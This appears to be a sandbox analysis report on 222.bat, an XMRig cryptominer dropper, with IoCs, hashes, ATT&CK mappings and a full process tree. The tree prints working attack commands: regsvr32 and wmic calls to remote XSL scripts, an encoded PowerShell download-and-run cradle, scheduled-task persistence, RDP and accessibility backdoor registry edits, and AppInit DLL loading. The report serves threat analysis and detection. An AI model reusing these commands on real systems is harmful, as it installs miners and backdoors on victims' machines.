xmrig | 30899cd09dd5df4bfe5242ef5ff17f353ce1fd07a8c762702c1eb4e2ba8bfba1

Resubmissions

16-10-2021 08:50

211016-krydjscfbj 10

16-10-2021 06:51

211016-hmx6wabgb9 10

Analysis

max time kernel
120s
max time network
111s
platform
windows7_x64
resource
win7-en-20210920
submitted
16-10-2021 06:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

222.bat
Size

89B
MD5

75a4daa4b7e656ded55a6a7865342d04
SHA1

8e52d1f4dfa6bd9501ba89855b44059bf92f699e
SHA256

30899cd09dd5df4bfe5242ef5ff17f353ce1fd07a8c762702c1eb4e2ba8bfba1
SHA512

16fafec07a8ebed3d602c6af50323a2c8e0f784f4d8ccd172d78d935cb7e8a2294a51c02999a04e53efdaf290a5de687cb7654d67f38590eee392431bd7c2334

Score

10^/10

xmrig evasion miner persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://cat.xiaoshabi.nl/networks.ps1

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 5 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\Microsoft\Network\Connections\services.exe	xmrig
C:\ProgramData\Microsoft\Network\services.exe	xmrig
\ProgramData\Microsoft\Network\services.exe	xmrig
C:\ProgramData\Microsoft\Network\services.exe	xmrig
\ProgramData\Microsoft\Network\services.exe	xmrig

Blocklisted process makes network request 12 IoCs

Processes:

powershell.exe

flow	pid	process
6	1104	powershell.exe
7	1104	powershell.exe
8	1104	powershell.exe
9	1104	powershell.exe
10	1104	powershell.exe
12	1104	powershell.exe
13	1104	powershell.exe
14	1104	powershell.exe
15	1104	powershell.exe
16	1104	powershell.exe
17	1104	powershell.exe
18	1104	powershell.exe

Executes dropped EXE 11 IoCs

Processes:

mon.exemin.exeuas.exeSetACL.exeSetACL.exeSetACL.execohernece.exeservices.exeservices.exeservices.exeservices.exe

pid	process
1596	mon.exe
2012	min.exe
1972	uas.exe
1384	SetACL.exe
1284	SetACL.exe
1420	SetACL.exe
556	cohernece.exe
432	services.exe
1292	services.exe
1824	services.exe
1284	services.exe

Modifies AppInit DLL entries 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\Users\Admin\AppData\Local\Temp\cohernece.exe	upx
C:\Users\Admin\AppData\Local\Temp\cohernece.exe	upx

Loads dropped DLL 14 IoCs

Processes:

cmd.exepowershell.exesvchost.exeservices.exeservices.exeservices.exeschtasks.exeservices.exe

pid	process
1848	cmd.exe
1104	powershell.exe
1104	powershell.exe
876	svchost.exe
432	services.exe
1292	services.exe
1848
1292	services.exe
1824	services.exe
1252	schtasks.exe
1824	services.exe
1744
1744
1284	services.exe

Drops file in System32 directory 1 IoCs

Processes:

cohernece.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\FastUserSwitchingCompatibilityex.dll cohernece.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1524 schtasks.exe
1096 schtasks.exe
696 schtasks.exe
1252 schtasks.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXENETSTAT.EXE

pid process

1608 NETSTAT.EXE
1640 NETSTAT.EXE
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

272 reg.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

regsvr32.exe

pid process

1764 regsvr32.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\FastUserSwitchingCompatibilityex.dll	cohernece.exe

pid	process
1524	schtasks.exe
1096	schtasks.exe
696	schtasks.exe
1252	schtasks.exe

pid	process
1608	NETSTAT.EXE
1640	NETSTAT.EXE

pid	process
272	reg.exe

pid	process
1764	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.exeservices.exeservices.exeservices.exeschtasks.exeservices.exe

pid	process
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
432	services.exe
432	services.exe
432	services.exe
1292	services.exe
1292	services.exe
1824	services.exe
1824	services.exe
1252	schtasks.exe
1252	schtasks.exe
1824	services.exe
1284	services.exe
1824	services.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
1824	services.exe
1824	services.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exeNETSTAT.EXENETSTAT.EXESetACL.exeSetACL.exeSetACL.exesc.exesc.exeservices.exe

description	pid	process
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeIncreaseQuotaPrivilege	1104	powershell.exe
Token: SeSecurityPrivilege	1104	powershell.exe
Token: SeTakeOwnershipPrivilege	1104	powershell.exe
Token: SeLoadDriverPrivilege	1104	powershell.exe
Token: SeSystemProfilePrivilege	1104	powershell.exe
Token: SeSystemtimePrivilege	1104	powershell.exe
Token: SeProfSingleProcessPrivilege	1104	powershell.exe
Token: SeIncBasePriorityPrivilege	1104	powershell.exe
Token: SeCreatePagefilePrivilege	1104	powershell.exe
Token: SeBackupPrivilege	1104	powershell.exe
Token: SeRestorePrivilege	1104	powershell.exe
Token: SeShutdownPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeSystemEnvironmentPrivilege	1104	powershell.exe
Token: SeRemoteShutdownPrivilege	1104	powershell.exe
Token: SeUndockPrivilege	1104	powershell.exe
Token: SeManageVolumePrivilege	1104	powershell.exe
Token: 33	1104	powershell.exe
Token: 34	1104	powershell.exe
Token: 35	1104	powershell.exe
Token: SeShutdownPrivilege	1596	powercfg.exe
Token: SeShutdownPrivilege	1252	powercfg.exe
Token: SeShutdownPrivilege	1744	powercfg.exe
Token: SeDebugPrivilege	1608	NETSTAT.EXE
Token: SeDebugPrivilege	1640	NETSTAT.EXE
Token: SeBackupPrivilege	1384	SetACL.exe
Token: SeRestorePrivilege	1384	SetACL.exe
Token: SeTakeOwnershipPrivilege	1384	SetACL.exe
Token: SeBackupPrivilege	1284	SetACL.exe
Token: SeRestorePrivilege	1284	SetACL.exe
Token: SeTakeOwnershipPrivilege	1284	SetACL.exe
Token: SeBackupPrivilege	1420	SetACL.exe
Token: SeRestorePrivilege	1420	SetACL.exe
Token: SeTakeOwnershipPrivilege	1420	SetACL.exe
Token: SeSecurityPrivilege	896	sc.exe
Token: SeSecurityPrivilege	1664	sc.exe
Token: SeSecurityPrivilege	1664	sc.exe
Token: SeLockMemoryPrivilege	1284	services.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeregsvr32.execmd.exepowershell.execsc.exe

description	pid	process	target process
PID 1380 wrote to memory of 1764	1380	cmd.exe	regsvr32.exe
PID 1380 wrote to memory of 1764	1380	cmd.exe	regsvr32.exe
PID 1380 wrote to memory of 1764	1380	cmd.exe	regsvr32.exe
PID 1380 wrote to memory of 1764	1380	cmd.exe	regsvr32.exe
PID 1380 wrote to memory of 1764	1380	cmd.exe	regsvr32.exe
PID 1764 wrote to memory of 872	1764	regsvr32.exe	cmd.exe
PID 1764 wrote to memory of 872	1764	regsvr32.exe	cmd.exe
PID 1764 wrote to memory of 872	1764	regsvr32.exe	cmd.exe
PID 872 wrote to memory of 1104	872	cmd.exe	powershell.exe
PID 872 wrote to memory of 1104	872	cmd.exe	powershell.exe
PID 872 wrote to memory of 1104	872	cmd.exe	powershell.exe
PID 1104 wrote to memory of 1524	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 1524	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 1524	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 696	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 696	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 696	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 976	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 976	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 976	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 1292	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 1292	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 1292	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 1720	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 1720	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 1720	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 1840	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 1840	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 1840	1104	powershell.exe	netsh.exe
PID 1104 wrote to memory of 1524	1104	powershell.exe	schtasks.exe
PID 1104 wrote to memory of 1524	1104	powershell.exe	schtasks.exe
PID 1104 wrote to memory of 1524	1104	powershell.exe	schtasks.exe
PID 1104 wrote to memory of 1096	1104	powershell.exe	schtasks.exe
PID 1104 wrote to memory of 1096	1104	powershell.exe	schtasks.exe
PID 1104 wrote to memory of 1096	1104	powershell.exe	schtasks.exe
PID 1104 wrote to memory of 696	1104	powershell.exe	schtasks.exe
PID 1104 wrote to memory of 696	1104	powershell.exe	schtasks.exe
PID 1104 wrote to memory of 696	1104	powershell.exe	schtasks.exe
PID 1104 wrote to memory of 1596	1104	powershell.exe	powercfg.exe
PID 1104 wrote to memory of 1596	1104	powershell.exe	powercfg.exe
PID 1104 wrote to memory of 1596	1104	powershell.exe	powercfg.exe
PID 1104 wrote to memory of 1252	1104	powershell.exe	powercfg.exe
PID 1104 wrote to memory of 1252	1104	powershell.exe	powercfg.exe
PID 1104 wrote to memory of 1252	1104	powershell.exe	powercfg.exe
PID 1104 wrote to memory of 1744	1104	powershell.exe	powercfg.exe
PID 1104 wrote to memory of 1744	1104	powershell.exe	powercfg.exe
PID 1104 wrote to memory of 1744	1104	powershell.exe	powercfg.exe
PID 1104 wrote to memory of 1608	1104	powershell.exe	NETSTAT.EXE
PID 1104 wrote to memory of 1608	1104	powershell.exe	NETSTAT.EXE
PID 1104 wrote to memory of 1608	1104	powershell.exe	NETSTAT.EXE
PID 1104 wrote to memory of 1852	1104	powershell.exe	csc.exe
PID 1104 wrote to memory of 1852	1104	powershell.exe	csc.exe
PID 1104 wrote to memory of 1852	1104	powershell.exe	csc.exe
PID 1852 wrote to memory of 556	1852	csc.exe	cvtres.exe
PID 1852 wrote to memory of 556	1852	csc.exe	cvtres.exe
PID 1852 wrote to memory of 556	1852	csc.exe	cvtres.exe
PID 1104 wrote to memory of 1640	1104	powershell.exe	NETSTAT.EXE
PID 1104 wrote to memory of 1640	1104	powershell.exe	NETSTAT.EXE
PID 1104 wrote to memory of 1640	1104	powershell.exe	NETSTAT.EXE
PID 1104 wrote to memory of 896	1104	powershell.exe	findstr.exe
PID 1104 wrote to memory of 896	1104	powershell.exe	findstr.exe
PID 1104 wrote to memory of 896	1104	powershell.exe	findstr.exe
PID 1104 wrote to memory of 1508	1104	powershell.exe	findstr.exe
PID 1104 wrote to memory of 1508	1104	powershell.exe	findstr.exe

Views/modifies file attributes 1 TTPs 7 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1720 attrib.exe
1096 attrib.exe
904 attrib.exe
1748 attrib.exe
1840 attrib.exe
896 attrib.exe
1628 attrib.exe

pid	process
1720	attrib.exe
1096	attrib.exe
904	attrib.exe
1748	attrib.exe
1840	attrib.exe
896	attrib.exe
1628	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\222.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1380

C:\Windows\system32\regsvr32.exe
C:\Windows\system32\regsvr32.EXE /u /s /i:http://cat.xiaoshabi.nl/networks.xsl scrobj.dll
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAGEAdAAuAHgAaQBhAG8AcwBoAGEAYgBpAC4AbgBsAC8AbgBlAHQAdwBvAHIAawBzAC4AcABzADEAJwApACkA
3⤵
- Suspicious use of WriteProcessMemory
PID:872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAGEAdAAuAHgAaQBhAG8AcwBoAGEAYgBpAC4AbgBsAC8AbgBlAHQAdwBvAHIAawBzAC4AcABzADEAJwApACkA
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add policy name=netbc
5⤵
PID:1524

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add filterlist name=block
5⤵
PID:696

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add filteraction name=block action=block
5⤵
PID:976

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445
5⤵
PID:1292

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
5⤵
PID:1720

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static set policy name=netbc assign=y
5⤵
PID:1840

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn Microsoft\Windows\MUI\LMRemove /tr "regsvr32 /u /s /i:http://cat.dashabi.in/networks.xsl scrobj.dll" /sc onstart /ru System /F
5⤵
- Creates scheduled task(s)
PID:1524

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn Microsoft\Windows\Multimedia\SystemEventService /tr "regsvr32 /u /s /i:http://cat.xiaojiji.nl/networks.xsl scrobj.dll" /sc minute /mo 720 /ru System /F
5⤵
- Creates scheduled task(s)
PID:1096

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn Microsoft\Windows\PLA\System\pBqQmHXSE /tr "regsvr32 /u /s /i:http://cat.xiaoshabi.nl/networks.xsl scrobj.dll" /sc minute /mo 420 /ru System /F
5⤵
- Creates scheduled task(s)
PID:696

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" /CHANGE -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" /CHANGE -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1744

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -anop tcp
5⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hh1eimzl.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:1852

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9010.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC900F.tmp"
6⤵
PID:556

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -anop tcp
5⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /i /m /c:cryptonight c:\windows\explorer.exe
5⤵
PID:896

C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /i /m /c:cryptonight c:\windows\system32\sppsvc.exe
5⤵
PID:1508

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Network\Downloader\services.exe
5⤵
- Views/modifies file attributes
PID:1096

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Network\Connections\OSFMount.sys
5⤵
- Views/modifies file attributes
PID:904

C:\Users\Admin\AppData\Local\Temp\mon.exe
"C:\Users\Admin\AppData\Local\Temp\mon.exe" -pSwifck
5⤵
- Executes dropped EXE
PID:1596

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Network\Connections\services.exe
5⤵
- Views/modifies file attributes
PID:1748

C:\Users\Admin\AppData\Local\Temp\min.exe
"C:\Users\Admin\AppData\Local\Temp\min.exe" -pSwifck
5⤵
- Executes dropped EXE
PID:2012

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Network\services.exe
5⤵
- Views/modifies file attributes
PID:1840

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Windows\Caches\SecureAssessmentHandlerstor.dll
5⤵
- Views/modifies file attributes
PID:896

C:\Users\Admin\AppData\Local\Temp\uas.exe
"C:\Users\Admin\AppData\Local\Temp\uas.exe" -pSwifcks
5⤵
- Executes dropped EXE
PID:1972

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\Microsoft\Windows\1.bat" "
6⤵
- Loads dropped DLL
PID:1848

C:\Windows\SysWOW64\sc.exe
sc stop ias
7⤵
PID:1540

C:\Windows\SysWOW64\sc.exe
sc delete ias
7⤵
PID:1888

C:\Windows\SysWOW64\sc.exe
sc stop FastUserSwitchingCompatibility
7⤵
PID:1144

C:\Windows\SysWOW64\sc.exe
sc delete FastUserSwitchingCompatibility
7⤵
PID:1180

C:\ProgramData\Microsoft\Windows\SetACL.exe
C:\ProgramData\Microsoft\Windows\SetACL.exe -on "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator" -ot reg -actn setowner -ownr "n:Administrators"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\ProgramData\Microsoft\Windows\SetACL.exe
C:\ProgramData\Microsoft\Windows\SetACL.exe -on "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator" -ot reg -actn ace -ace "n:Administrators;p:full"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1284

\??\c:\windows\SysWOW64\reg.exe
c:\windows\System32\reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator" /v StartExe /t REG_EXPAND_SZ /d "C:\ProgramData\Microsoft\Windows\WER\cmd.exe" /f /reg:64
7⤵
PID:1592

C:\ProgramData\Microsoft\Windows\SetACL.exe
SetACL.exe -on "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator" -ot reg -actn ace -ace "n:Administrators;p:read"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1420

\??\c:\windows\SysWOW64\reg.exe
c:\windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
7⤵
PID:1608

\??\c:\windows\SysWOW64\reg.exe
c:\windows\System32\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
7⤵
- Modifies registry key
PID:272

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +a +r C:\ProgramData\Microsoft\Windows\WER\cmd.exe
7⤵
- Views/modifies file attributes
PID:1628

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Windows\WER\cmd.exe
5⤵
- Views/modifies file attributes
PID:1720

C:\Users\Admin\AppData\Local\Temp\cohernece.exe
"C:\Users\Admin\AppData\Local\Temp\cohernece.exe"
5⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:556

C:\windows\System32\reg.exe
"C:\windows\System32\reg.exe" add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0 /f /reg:64
5⤵
PID:376

C:\windows\System32\reg.exe
"C:\windows\System32\reg.exe" add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f /reg:64
5⤵
PID:1540

C:\windows\System32\reg.exe
"C:\windows\System32\reg.exe" add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d C:\\ProgramData\\Microsoft\\Windows\\Caches\\SecureAssessmentHandlerstor.dll /f /reg:64
5⤵
PID:1800

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" sdset "Event Logs" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:896

C:\ProgramData\Microsoft\Network\Downloader\services.exe
"C:\ProgramData\Microsoft\Network\Downloader\services.exe" install "Event Logs" c:\ProgramData\Microsoft\Network\services.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:432

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" sdset "Event Logs" D:(D;;DCLCWPDTSDCC;;;IU)(D;;DCLCWPDTSDCC;;;SU)(D;;DCLCWPDTSDCC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1664

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn Microsoft\Windows\RAC\RacTaskMgr /tr "wmic os get /format:'http://cat.xiaoshabi.nl:80/net/net.xsl'" /sc minute /mo 500 /ru System /F
5⤵
- Loads dropped DLL
- Creates scheduled task(s)
- Suspicious behavior: EnumeratesProcesses
PID:1252

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1304

C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k netsvcs
1⤵
- Loads dropped DLL
PID:876

C:\ProgramData\Microsoft\Network\Downloader\services.exe
C:\ProgramData\Microsoft\Network\Downloader\services.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1292

\??\c:\ProgramData\Microsoft\Network\services.exe
"c:\ProgramData\Microsoft\Network\services.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1824

\??\c:\ProgramData\Microsoft\Network\Connections\services.exe
c:\ProgramData\Microsoft\Network\Connections\services.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Network\Connections\OSFMount.sys
MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\ProgramData\Microsoft\Network\Connections\services.exe
MD5
548f5058ff8f4fdb514ba0592cdcf344

SHA1
08abe2336a8e6031cfa72bb04607836c8f2edac6

SHA256
796b34e03468bf448fb6c77386d41ba789ec80871fe18dacaa59a3031b579822

SHA512
62af61d1f0197e3fa8cbfb33cf5b791fc010220e5d11b9ba6471d214e32fdc4d8340fa5fd25910537cc69a96bf8e6d851a1a717eef3be618b2cf0fe2fa3a4f1a

Download Submit
C:\ProgramData\Microsoft\Network\Connections\services.exe
MD5
1ca5707f67b100715cc34d65eb6554c9

SHA1
49fb5e469aefd7acb1c92ecbd7e10f04182d0811

SHA256
31fd26a320116b66fd6821da1e094250045802c7512e06cb9ca5abb30a860f68

SHA512
f599d498ddae202d8247feeeb351624d08a6b53a554f03e1030680505c47cc791afac3304d5583445926657be43f6f94b16606ffb0323598f84e72c0c3d1bd2b

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\services.exe
MD5
31cbc246c3fbceee92ee42261257c0aa

SHA1
92ab05a2ef44111341720eb92aaab9051dc9aa0c

SHA256
2211bbe75be4866ebc40a78184e8dd28dadc4fe7c9d33a91a97fc30236425075

SHA512
d956146efcf4fb8c8d143dc0a158882ef162ac605157e19b52e2cee88b4595d7cae1e86306ce6d16a1b3359e2b0b5d3ae5a1ee5a802e3e0d18b2011ef7ed5b03

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\services.exe
MD5
31cbc246c3fbceee92ee42261257c0aa

SHA1
92ab05a2ef44111341720eb92aaab9051dc9aa0c

SHA256
2211bbe75be4866ebc40a78184e8dd28dadc4fe7c9d33a91a97fc30236425075

SHA512
d956146efcf4fb8c8d143dc0a158882ef162ac605157e19b52e2cee88b4595d7cae1e86306ce6d16a1b3359e2b0b5d3ae5a1ee5a802e3e0d18b2011ef7ed5b03

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\services.exe
MD5
31cbc246c3fbceee92ee42261257c0aa

SHA1
92ab05a2ef44111341720eb92aaab9051dc9aa0c

SHA256
2211bbe75be4866ebc40a78184e8dd28dadc4fe7c9d33a91a97fc30236425075

SHA512
d956146efcf4fb8c8d143dc0a158882ef162ac605157e19b52e2cee88b4595d7cae1e86306ce6d16a1b3359e2b0b5d3ae5a1ee5a802e3e0d18b2011ef7ed5b03

Download Submit
C:\ProgramData\Microsoft\Network\services.exe
MD5
d197c48ba18873bcc9156a44f6cfedd2

SHA1
23acc3c77beb3f9fba4eb33755a965e172caa93a

SHA256
02ff13a1315028d6e7a55e9dd5ac27354a601cc98ec40c7be593f7ca4066b681

SHA512
